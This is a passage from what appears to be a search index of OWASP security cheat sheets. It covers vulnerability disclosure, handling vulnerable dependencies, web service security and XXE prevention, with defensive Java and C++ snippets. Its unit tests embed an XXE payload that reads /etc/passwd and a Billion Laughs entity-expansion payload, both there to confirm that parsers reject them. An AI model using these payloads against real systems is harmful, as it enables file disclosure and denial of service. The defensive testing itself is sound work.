"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#researchers-demanding-payment","title":"Researchers Demanding Payment","text":"

Some individuals may approach an organisation claiming to have found a vulnerability, and demanding payment before sharing the details. Although these requests may be legitimate, in many cases they are simply scams.

One option is to request that they carry out the disclosure through a mediated bug bounty platform, which can provide a level of protection for both sides, as scammers are unlikely to be willing to use these platforms.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#disclosure","title":"Disclosure","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#commercial-and-open-source-software","title":"Commercial and Open Source Software","text":"

Once the vulnerability has been resolved (and retested), the details should be published in a security advisory for the software. It is important to remember that publishing the details of security issues does not make the vendor look bad. All software has security vulnerabilities, and demonstrating a clear and established process for handling and disclosing them gives far more confidence in the security of the software than trying to hide the issues.

At a minimum, the security advisory must contain:

Where possible it is also good to include:

Security advisories should be easy for developers and system administrators to find. Common ways to publish them include:

Some researchers may publish their own technical write-ups of the vulnerability, which will usually include the full details required to exploit it (and sometimes even working exploit code). For more serious vulnerabilities, it may be sensible to ask the researcher to delay publishing the full details for a period of time (such as a week), in order to give system administrators more time to install the patches before exploit code is available. However, once the patch has been released, attackers will be able to reverse engineer the vulnerability and develop their own exploit code, so there is limited value in delaying the full release.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-systems","title":"Private Systems","text":"

For vulnerabilities in private systems, a decision needs to be made about whether the details should be published once the vulnerability has been resolved. Most bug bounty programs give organisations the option about whether to disclose the details once the issue has been resolved, although it is not typically required.

Publishing these details helps to demonstrate that the organisation is taking a proactive and transparent approach to security, but can also result in potentially embarrassing omissions and misconfigurations being made public. In the event of a future compromise or data breach, they could also potentially be used as evidence of a weak security culture within the organisation. Additionally, they may expose technical details about internal systems, and could help attackers identify other similar issues. As such, this decision should be carefully evaluated, and it may be wise to take legal advice.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#rewarding-researchers","title":"Rewarding Researchers","text":"

Where researchers have identified and reported vulnerabilities outside of a bug bounty program (essentially providing free security testing), and have acted professionally and helpfully throughout the vulnerability disclosure process, it is good to offer them some kind of reward to encourage this kind of positive interaction in future. If monetary rewards are not possible then a number of other options should be considered, such as:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html","title":"Vulnerable Dependency Management Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of this cheat sheet is to propose an approach for handling vulnerable third-party dependencies when they are detected, depending on the situation.

The cheat sheet is not tool-oriented, but it contains a tools section informing the reader about free and commercial solutions that can be used to detect vulnerable dependencies, depending on the level of support for the technologies at hand.

Note:

Proposals mentioned in this cheat sheet are not silver bullets (recipes that work in all situations), but they can be used as a foundation and adapted to your context.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context","title":"Context","text":"

Most projects use third-party dependencies to delegate the handling of different kinds of operations, e.g. generating documents in a specific format, HTTP communication, parsing data in a specific format, etc.

This is a good approach because it allows the development team to focus on the real application code supporting the expected business features. However, the dependency brings an expected downside: the security posture of the real application now also rests on it.

This aspect is referenced in the following projects:

Based on this context, it's important for a project to ensure that all the third-party dependencies used are free of security issues, and, if they do contain any, that the development team is aware of them and applies the required mitigation measures to secure the affected application.

It's highly recommended to perform automated analysis of the dependencies from the birth of the project. Indeed, if this task is added in the middle or at the end of the project, it can imply a huge amount of work to handle all the issues identified, which in turn imposes a huge burden on the development team and can block the advancement of the project at hand.

Note:

In the rest of the cheat sheet, when we refer to the development team, we assume that the team contains a member with the required application security skills, or can refer to someone in the company having these kinds of skills, to analyse the vulnerability impacting the dependency.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-detection","title":"Remark about the detection","text":"

It's important to keep in mind the different ways in which a security issue is handled after its discovery.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#1-responsible-disclosure","title":"1. Responsible disclosure","text":"

See a description here.

A researcher discovers a vulnerability in a component and, after collaboration with the component provider, a CVE is issued (sometimes a provider-specific vulnerability identifier is created, but a CVE identifier is generally preferred). The CVE allows public referencing of the issue as well as of the available fix/mitigation.

If the provider doesn't properly cooperate with the researcher, the following results are expected:

Here, the vulnerability is always referenced in the global CVE database, which detection tools generally use as one of their several input sources.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#2-full-disclosure","title":"2. Full disclosure","text":"

See a description here, in the section about computer security.

The researcher decides to release all the information, including the exploitation code/method, on services like the Full Disclosure mailing list or Exploit-DB.

Here, a CVE is not always created, so the vulnerability is not always present in the global CVE database, and detection tools can be blind to it unless they use other input sources.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-security-issue-handling-decision","title":"Remark about the security issue handling decision","text":"

When a security issue is detected, it's possible to decide to accept the risk represented by the security issue. However, this decision must be taken by the Chief Risk Officer (with a possible fallback to the Chief Information Security Officer) of the company, based on technical feedback from the development team that has analyzed the issue (see the Cases section) as well as the CVE's CVSS score indicators.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#cases","title":"Cases","text":"

When a security issue is detected, the development team can meet one of the situations (named Case in the rest of the cheat sheet) presented in the subsections below.

If the vulnerability impacts a transitive dependency, then the action will be taken on the direct dependency of the project, because acting directly on a transitive dependency often impacts the stability of the application.

Acting on a transitive dependency requires the development team to fully understand the complete relation/communication/usage chain from the project's first-level dependency down to the dependency impacted by the security vulnerability; this task is very time consuming.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-1","title":"Case 1","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_1","title":"Context","text":"

A patched version of the component has been released by the provider.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach","title":"Ideal condition of application of the approach","text":"

A set of automated unit, integration, functional, or security tests exists for the features of the application using the impacted dependency, allowing the team to validate that the features remain operational.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach","title":"Approach","text":"

Step 1:

Update the version of the dependency in the project on a testing environment.

Step 2:

Run the tests; two output paths are possible:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-2","title":"Case 2","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_2","title":"Context","text":"

The provider informs the team that it will take a while to fix the issue, so a patched version will not be available for several months.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_1","title":"Ideal condition of application of the approach","text":"

The provider can share any of the below with the development team:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_1","title":"Approach","text":"

Step 1:

If a workaround is provided, it should be applied and validated on the testing environment, and thereafter deployed to production.

If the provider has given the team a list of the impacted functions, protective code must wrap the calls to these functions to ensure that the input and the output data is safe.

Moreover, security devices, such as the Web Application Firewall (WAF), can handle such issues by protecting the internal applications through parameter validation and by generating detection rules for those specific libraries. Yet, in this cheat sheet, the focus is set on the application level in order to patch the vulnerability as close as possible to the source.

Example using Java code in which the impacted function suffers from a Remote Code Execution issue:

public void callFunctionWithRCEIssue(String externalInput){\n//Apply input validation on the external input using regex\nif(Pattern.matches(\"[a-zA-Z0-9]{1,50}\", externalInput)){\n//Call the flawed function using safe input\nfunctionWithRCEIssue(externalInput);\n}else{\n//Log the detection of exploitation\nSecurityLogger.warn(\"Exploitation of the RCE issue XXXXX detected !\");\n//Raise an exception leading to a generic error send to the client...\n}\n}\n

If the provider has provided nothing about the vulnerability, Case 3 can be applied, skipping Step 2 of this case. We assume here that, at least, the CVE has been provided.

Step 2:

If the provider has provided the team with the exploitation code, and the team has built a security wrapper around the vulnerable library/code, execute the exploitation code to ensure that the library is now protected and doesn't affect the application.

If you have a set of automated unit, integration, functional, or security tests for the application, run them to verify that the added protection code does not impact the stability of the application.

Add a note in the project README explaining how the issue (specify the related CVE) is handled while waiting for a patched version, because the detection tool will continue to raise an alert on this dependency.

Note: You can add the dependency to the ignore list, but the ignore scope for this dependency must only cover the CVE related to the vulnerability, because a dependency can be impacted by several vulnerabilities, each with its own CVE.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-3","title":"Case 3","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_3","title":"Context","text":"

The provider informs the team that they cannot fix the issue, so no patched version will be released at all (this also applies if the provider does not want to fix the issue or does not answer at all).

In this case the only information given to the development team is the CVE.

Notes:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_2","title":"Ideal condition of application of the approach","text":"

Nothing specific, because here we are in a patch-it-yourself situation.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_2","title":"Approach","text":"

Step 1:

If we are in this case due to one of the following conditions, it's a good idea to start a parallel study to find another, better-maintained component or, if it's a commercial component with support, to put pressure on the provider with the help of your Chief Risk Officer (with a possible fallback to the Chief Information Security Officer):

In all cases, the vulnerability needs to be handled right now.

Step 2:

As we know the vulnerable dependency, we know where it is used in the application (if it's a transitive dependency, we can identify the first-level dependency using it through the IDE's built-in features or the dependency management system in use: Maven, Gradle, NuGet, npm, etc.). Note that the IDE is also used to identify the calls to the dependency.

Identifying the calls to this dependency is only the first step; the team still lacks information on what kind of patching needs to be performed.

To obtain this information, the team uses the CVE content to determine which kind of vulnerability affects the dependency. The description property provides the answer: SQL injection, Remote Code Execution, Cross-Site Scripting, Cross-Site Request Forgery, etc.

After identifying the above two points, the team knows the type of patching that needs to be applied (Case 2 with the protective code) and where to add it.

Example:

The team has an application using the Jackson API in a version exposed to CVE-2016-3720.

The description of the CVE is as follows:

XML external entity (XXE) vulnerability in XmlMapper in the Data format extension for Jackson\n(aka jackson-dataformat-xml) allows attackers to have unspecified impact via unknown vectors.\n

Based on this information, the team determines that the necessary patching will be to add pre-validation of any XML data passed to the Jackson API to prevent the XML external entity (XXE) vulnerability.
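
As an illustration, a minimal sketch of such a pre-validation wrapper is shown below (the class name, the use of Jackson's XmlMapper.readValue, and the reuse of the hypothetical SecurityLogger from the earlier example are illustrative assumptions; adapt the rejection rule to the business case):

import com.fasterxml.jackson.dataformat.xml.XmlMapper;\nimport java.io.IOException;\n\npublic final class SafeXmlMapperWrapper {\n\nprivate static final XmlMapper XML_MAPPER = new XmlMapper();\n\npublic static <T> T readValue(String xml, Class<T> type) throws IOException {\n//Pre-validation: reject any document carrying a DOCTYPE declaration,\n//because external entities can only be declared through a DTD\nif (xml == null || xml.toUpperCase().contains(\"<!DOCTYPE\")) {\n//Log the detection of a potential exploitation attempt (hypothetical logger from the example above)\nSecurityLogger.warn(\"Potential exploitation of the XXE issue CVE-2016-3720 detected !\");\nthrow new IOException(\"Invalid XML input\");\n}\n//Delegate to the vulnerable API only with pre-validated input\nreturn XML_MAPPER.readValue(xml, type);\n}\n}\n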

Step 3:

If possible, create a unit test that mimics the vulnerability in order to ensure that the patch is effective and to have a way to continuously ensure that the patch stays in place as the project evolves.
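
For instance, a JUnit 5 test sketch (assuming the hypothetical SafeXmlMapperWrapper from the sketch above) that feeds a classic XXE payload to the wrapper and expects it to be rejected, so a regression would make the build fail:

import static org.junit.jupiter.api.Assertions.assertThrows;\nimport org.junit.jupiter.api.Test;\nimport java.io.IOException;\n\npublic class XxePatchRegressionTest {\n\n@Test\npublic void rejectsDocumentsContainingADoctype() {\n//Classic XXE payload trying to read a local file through an external entity\nString payload = \"<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>\";\n//The wrapper must refuse to parse the document, proving the patch is still in place\nassertThrows(IOException.class, () -> SafeXmlMapperWrapper.readValue(payload, Object.class));\n}\n}\n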

If you have a set of automated unit, integration, functional, or security tests for the application, run them to verify that the patch does not impact the stability of the application.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-4","title":"Case 4","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_4","title":"Context","text":"

The vulnerable dependency is found during one of the following situations, in which the provider is not aware of the vulnerability:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_3","title":"Ideal condition of application of the approach","text":"

The provider collaborates with you after being notified of the vulnerability.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_3","title":"Approach","text":"

Step 1:

Inform the provider about the vulnerability by sharing the post with them.

Step 2:

If the provider collaborates, apply Case 2; otherwise apply Case 3, but instead of analyzing the CVE information, the team analyzes the information from the full disclosure post or the pentester's exploitation feedback.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#tools","title":"Tools","text":"

This section lists several tools that can be used to analyse the dependencies used by a project, in order to detect vulnerabilities.

During the selection process of a vulnerable dependency detection tool, it's important to ensure that the tool:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html","title":"Web Service Security Cheat Sheet","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing guidance for securing web services and preventing web services related attacks.

Please note that due to the differences in implementation between frameworks, this cheat sheet is kept at a high level.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-confidentiality","title":"Transport Confidentiality","text":"

Transport confidentiality protects against eavesdropping and man-in-the-middle attacks against web service communications to/from the server.

Rule: All communication with and between web services containing sensitive features, an authenticated session, or transfer of sensitive data must be encrypted using well-configured TLS. This is recommended even if the messages themselves are encrypted because TLS provides numerous benefits beyond traffic confidentiality including integrity protection, replay defenses, and server authentication. For more information on how to do this properly see the Transport Layer Protection Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#server-authentication","title":"Server Authentication","text":"

Rule: TLS must be used to authenticate the service provider to the service consumer. The service consumer should verify the server certificate is issued by a trusted provider, is not expired, is not revoked, matches the domain name of the service, and that the server has proven that it has the private key associated with the public key certificate (by properly signing something or successfully decrypting something encrypted with the associated public key).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#user-authentication","title":"User Authentication","text":"

User authentication verifies the identity of the user or the system trying to connect to the service. Such authentication is usually a function of the container of the web service.

Rule: If used, Basic Authentication must be conducted over TLS, but Basic Authentication is not recommended because it discloses secrets in plain text (base64 encoded) in HTTP headers.

Rule: Client Certificate Authentication using Mutual-TLS is a common form of authentication that is recommended where appropriate. See: Authentication Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-encoding","title":"Transport Encoding","text":"

SOAP encoding styles are meant to move data between software objects into XML format and back again.

Rule: Enforce the same encoding style between the client and the server.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-integrity","title":"Message Integrity","text":"

This is for data at rest. The integrity of data in transit can easily be provided by TLS.

When using public key cryptography, encryption does guarantee confidentiality but it does not guarantee integrity since the receiver's public key is public. For the same reason, encryption does not ensure the identity of the sender.

Rule: For XML data, use XML digital signatures to provide message integrity using the sender's private key. This signature can be validated by the recipient using the sender's digital certificate (public key).
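
A minimal sketch using the standard javax.xml.crypto.dsig API to produce such an enveloped signature is shown below (the file name, the freshly generated RSA key pair, and the hardened parser configuration are illustrative assumptions; in practice the sender's private key would come from a keystore):

import java.io.File;\nimport java.security.KeyPair;\nimport java.security.KeyPairGenerator;\nimport java.util.Collections;\nimport javax.xml.crypto.dsig.*;\nimport javax.xml.crypto.dsig.dom.DOMSignContext;\nimport javax.xml.crypto.dsig.spec.C14NMethodParameterSpec;\nimport javax.xml.crypto.dsig.spec.TransformParameterSpec;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport org.w3c.dom.Document;\n\npublic class XmlSigningSketch {\npublic static void main(String[] args) throws Exception {\n// Parse the message to sign with a hardened factory (see the XML External Entity Prevention Cheat Sheet)\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\ndbf.setNamespaceAware(true);\ndbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nDocument doc = dbf.newDocumentBuilder().parse(new File(\"message.xml\"));\n\n// Sender's key pair (illustrative; load the private key from a keystore in real code)\nKeyPair kp = KeyPairGenerator.getInstance(\"RSA\").generateKeyPair();\n\nXMLSignatureFactory fac = XMLSignatureFactory.getInstance(\"DOM\");\n// Reference the whole document (empty URI) with a SHA-256 digest and an enveloped transform\nReference ref = fac.newReference(\"\",\nfac.newDigestMethod(DigestMethod.SHA256, null),\nCollections.singletonList(fac.newTransform(Transform.ENVELOPED, (TransformParameterSpec) null)),\nnull, null);\nSignedInfo si = fac.newSignedInfo(\nfac.newCanonicalizationMethod(CanonicalizationMethod.INCLUSIVE, (C14NMethodParameterSpec) null),\nfac.newSignatureMethod(\"http://www.w3.org/2001/04/xmldsig-more#rsa-sha256\", null),\nCollections.singletonList(ref));\n\n// Sign with the sender's private key; the recipient validates with the sender's certificate/public key\nDOMSignContext dsc = new DOMSignContext(kp.getPrivate(), doc.getDocumentElement());\nfac.newXMLSignature(si, null).sign(dsc);\n}\n}\n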

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-confidentiality","title":"Message Confidentiality","text":"

Data elements meant to be kept confidential must be encrypted using a strong encryption cipher with an adequate key length to deter brute-forcing.

Rule: Messages containing sensitive data must be encrypted using a strong encryption cipher. This could be transport encryption or message encryption.

Rule: Messages containing sensitive data that must remain encrypted at rest after receipt must be encrypted with strong data encryption, not just transport encryption.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#authorization","title":"Authorization","text":"

Web services need to authorize web service clients the same way web applications authorize users. A web service needs to make sure a web service client is authorized to perform a certain action (coarse-grained) on the requested data (fine-grained).

Rule: A web service should check whether its clients are authorized to access the method in question. Following an authentication challenge, the web service should check whether the requesting entity has the privileges to access the requested resource. This should be done on every request, and a challenge-response authorization mechanism should be added to sensitive resources like password changes, primary contact details such as email, physical address, payment or delivery instructions.

Rule: Ensure access to administration and management functions within the Web Service Application is limited to web service administrators. Ideally, any administrative capabilities would be in an application that is completely separate from the web services being managed by these capabilities, thus completely separating normal users from these sensitive functions.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#schema-validation","title":"Schema Validation","text":"

Schema validation enforces constraints and syntax defined by the schema.

Rule: Web services must validate SOAP payloads against their associated XML schema definition (XSD).

Rule: The XSD defined for a SOAP web service should, at a minimum, define the maximum length and character set of every parameter allowed to pass into and out of the web service.

Rule: The XSD defined for a SOAP web service should define strong (ideally allow-list) validation patterns for all fixed format parameters (e.g., zip codes, phone numbers, list values, etc.).
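
As an illustration of the first rule, a minimal Java sketch validating an incoming SOAP payload against its XSD could look like the following (the schema file name is a placeholder, and the SchemaFactory is hardened as described in the XML External Entity Prevention Cheat Sheet):

import java.io.File;\nimport java.io.StringReader;\nimport javax.xml.XMLConstants;\nimport javax.xml.transform.stream.StreamSource;\nimport javax.xml.validation.Schema;\nimport javax.xml.validation.SchemaFactory;\nimport javax.xml.validation.Validator;\n\npublic final class SoapPayloadValidator {\n\npublic static void validate(String soapXml) throws Exception {\nSchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);\n// Block external DTD/schema resolution while validating\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\n// \"service.xsd\" is a placeholder for the XSD associated with the web service\nSchema schema = factory.newSchema(new File(\"service.xsd\"));\nValidator validator = schema.newValidator();\n// Throws SAXException if the payload violates the schema constraints (length, character set, patterns...)\nvalidator.validate(new StreamSource(new StringReader(soapXml)));\n}\n}\n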

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#content-validation","title":"Content Validation","text":"

Rule: Like any web application, web services need to validate input before consuming it. Content validation for XML input should include:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Web services need to ensure that the output sent to clients is encoded to be consumed as data and not as scripts. This gets pretty important when web service clients use the output to render HTML pages either directly or indirectly using AJAX objects.

Rule: All the rules of output encoding apply, as per the Cross Site Scripting Prevention Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#virus-protection","title":"Virus Protection","text":"

SOAP provides the ability to attach files and documents to SOAP messages. This gives the opportunity for hackers to attach viruses and malware to these SOAP messages.

Rule: Ensure Virus Scanning technology is installed, and preferably inline, so files and attachments can be checked before being saved to disk.

Rule: Ensure Virus Scanning technology is regularly updated with the latest virus definitions/rules.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-size","title":"Message Size","text":"

Web services, like web applications, can be a target for DoS attacks that automatically send the web services thousands of large SOAP messages. This either cripples the application, making it unable to respond to legitimate messages, or takes it down entirely.

Rule: SOAP message size should be limited to an appropriate size limit. A larger size limit (or no limit at all) increases the chances of a successful DoS attack.
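
A minimal sketch of how such a limit could be enforced in front of a Java SOAP endpoint using a servlet filter (the javax.servlet API, the limit value, the class name, and the decision to reject requests without a declared Content-Length are illustrative assumptions):

import java.io.IOException;\nimport javax.servlet.Filter;\nimport javax.servlet.FilterChain;\nimport javax.servlet.FilterConfig;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\nimport javax.servlet.http.HttpServletResponse;\n\npublic class MessageSizeFilter implements Filter {\n\n// Example limit: 512 KB per SOAP message\nprivate static final long MAX_BYTES = 512 * 1024;\n\npublic void init(FilterConfig filterConfig) {}\n\npublic void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)\nthrows IOException, ServletException {\nlong length = req.getContentLengthLong();\n// Reject oversized messages, and messages without a declared length (e.g. chunked requests)\nif (length > MAX_BYTES || length == -1) {\n((HttpServletResponse) res).sendError(413); // Payload Too Large\nreturn;\n}\nchain.doFilter(req, res);\n}\n\npublic void destroy() {}\n}\n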

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#availability","title":"Availability","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#resources-limiting","title":"Resources Limiting","text":"

During regular operation, web services require computational power such as CPU cycles and memory. Due to malfunction or while under attack, a web service may require too many resources, leaving the host system unstable.

Rule: Limit the amount of CPU cycles the web service can use based on expected service rate, in order to have a stable system.

Rule: Limit the amount of memory the web service can use to avoid the system running out of memory. In some cases, the host system may start killing processes to free up memory.

Rule: Limit the number of simultaneous open files, network connections and started processes.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-throughput","title":"Message Throughput","text":"

Throughput represents the number of web service requests served during a specific amount of time.

Rule: Configuration should be optimized for maximum message throughput to avoid running into DoS-like situations.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#xml-denial-of-service-protection","title":"XML Denial of Service Protection","text":"

XML Denial of Service is probably the most serious attack against web services. So the web service must provide the following validation:

Rule: Validation against recursive payloads.

Rule: Validation against oversized payloads.

Rule: Protection against XML entity expansion.

Rule: Validation against overlong element names. If you are working with SOAP-based web services, the element names are the SOAP Actions.

This protection should be provided by your XML parser/schema validator. To verify, build test cases to make sure your parser is resistant to these types of attacks.
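
For example, a JUnit 5 test sketch (assumptions: the hardened DocumentBuilderFactory configuration from the XML External Entity Prevention Cheat Sheet and a truncated Billion Laughs payload) verifying that the parser rejects an entity-expansion bomb instead of expanding it:

import static org.junit.jupiter.api.Assertions.assertThrows;\nimport java.io.StringReader;\nimport javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport org.junit.jupiter.api.Test;\nimport org.xml.sax.InputSource;\nimport org.xml.sax.SAXException;\n\npublic class XmlDosProtectionTest {\n\n@Test\npublic void rejectsEntityExpansionBombs() throws Exception {\n// Shortened Billion Laughs payload (single quotes avoid extra escaping)\nString billionLaughs = \"<?xml version='1.0'?>\"\n+ \"<!DOCTYPE lolz [<!ENTITY lol 'lol'>\"\n+ \"<!ENTITY lol2 '&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;'>\"\n+ \"<!ENTITY lol3 '&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;'>]>\"\n+ \"<lolz>&lol3;</lolz>\";\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n// Hardened configuration: DOCTYPE declarations are disallowed entirely\ndbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nDocumentBuilder builder = dbf.newDocumentBuilder();\n// The parser must refuse the document instead of expanding the entities\nassertThrows(SAXException.class,\n() -> builder.parse(new InputSource(new StringReader(billionLaughs))));\n}\n}\n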

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#endpoint-security-profile","title":"Endpoint Security Profile","text":"

Rule: Web services must be compliant with Web Services-Interoperability (WS-I) Basic Profile at minimum.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html","title":"XML External Entity Prevention Cheat Sheet","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

XML eXternal Entity injection (XXE), which is now part of the OWASP Top 10 via point A4, is a type of attack against an application that parses XML input.

The XXE issue is referenced under ID 611 in the Common Weakness Enumeration (CWE).

This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser.

This attack may lead to the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning from the perspective of the machine where the parser is located, and other system impacts. The following guide provides concise information to prevent this vulnerability.

For more information on XXE, please visit XML External Entity (XXE).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#general-guidance","title":"General Guidance","text":"

The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:

factory.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n

Disabling DTDs also makes the parser secure against denial of services (DOS) attacks such as Billion Laughs. If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that's specific to each parser.

Detailed XXE Prevention guidance for a number of languages and commonly used XML parsers in those languages is provided below.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#cc","title":"C/C++","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2","title":"libxml2","text":"

The Enum xmlParserOption should not have the following options defined:

Note:

According to this post, starting with libxml2 version 2.9, XXE has been disabled by default, as committed by the following patch.

Search for the usage of the following APIs to ensure there is no XML_PARSE_NOENT and XML_PARSE_DTDLOAD defined in the parameters:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxerces-c","title":"libxerces-c","text":"

When using XercesDOMParser, do this to prevent XXE:

XercesDOMParser *parser = new XercesDOMParser;\nparser->setCreateEntityReferenceNodes(true);\nparser->setDisableDefaultEntityResolution(true);\n

When using SAXParser, do this to prevent XXE:

SAXParser* parser = new SAXParser;\nparser->setDisableDefaultEntityResolution(true);\n

When using SAX2XMLReader, do this to prevent XXE:

SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();\nreader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java","title":"Java","text":"

Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers are to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use. The following describes how to disable XXE in the most commonly used XML parsers for Java.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j","title":"JAXP DocumentBuilderFactory, SAXParserFactory and DOM4J","text":"

DocumentBuilderFactory, SAXParserFactory and DOM4J XML Parsers can be configured using the same techniques to protect them against XXE.

Only the DocumentBuilderFactory example is presented here. The JAXP DocumentBuilderFactory setFeature method allows a developer to control which implementation-specific XML processor features are enabled or disabled.

The features can either be set on the factory or the underlying XMLReader setFeature method.

Each XML processor implementation has its own features that govern how DTDs and external entities are processed. By disabling DTD processing entirely, most XXE attacks can be averted, although it is also necessary to disable or verify that XInclude is not enabled.

Since JDK 6, the flag FEATURE_SECURE_PROCESSING can be used to instruct the parser implementation to process XML securely. Its behaviour is implementation dependent. Even if it can help tackle resource exhaustion, it may not always mitigate entity expansion. More details on this flag can be found here.

For a syntax highlighted example code snippet using SAXParserFactory, look here. Example code disabling DTDs (doctypes) altogether:

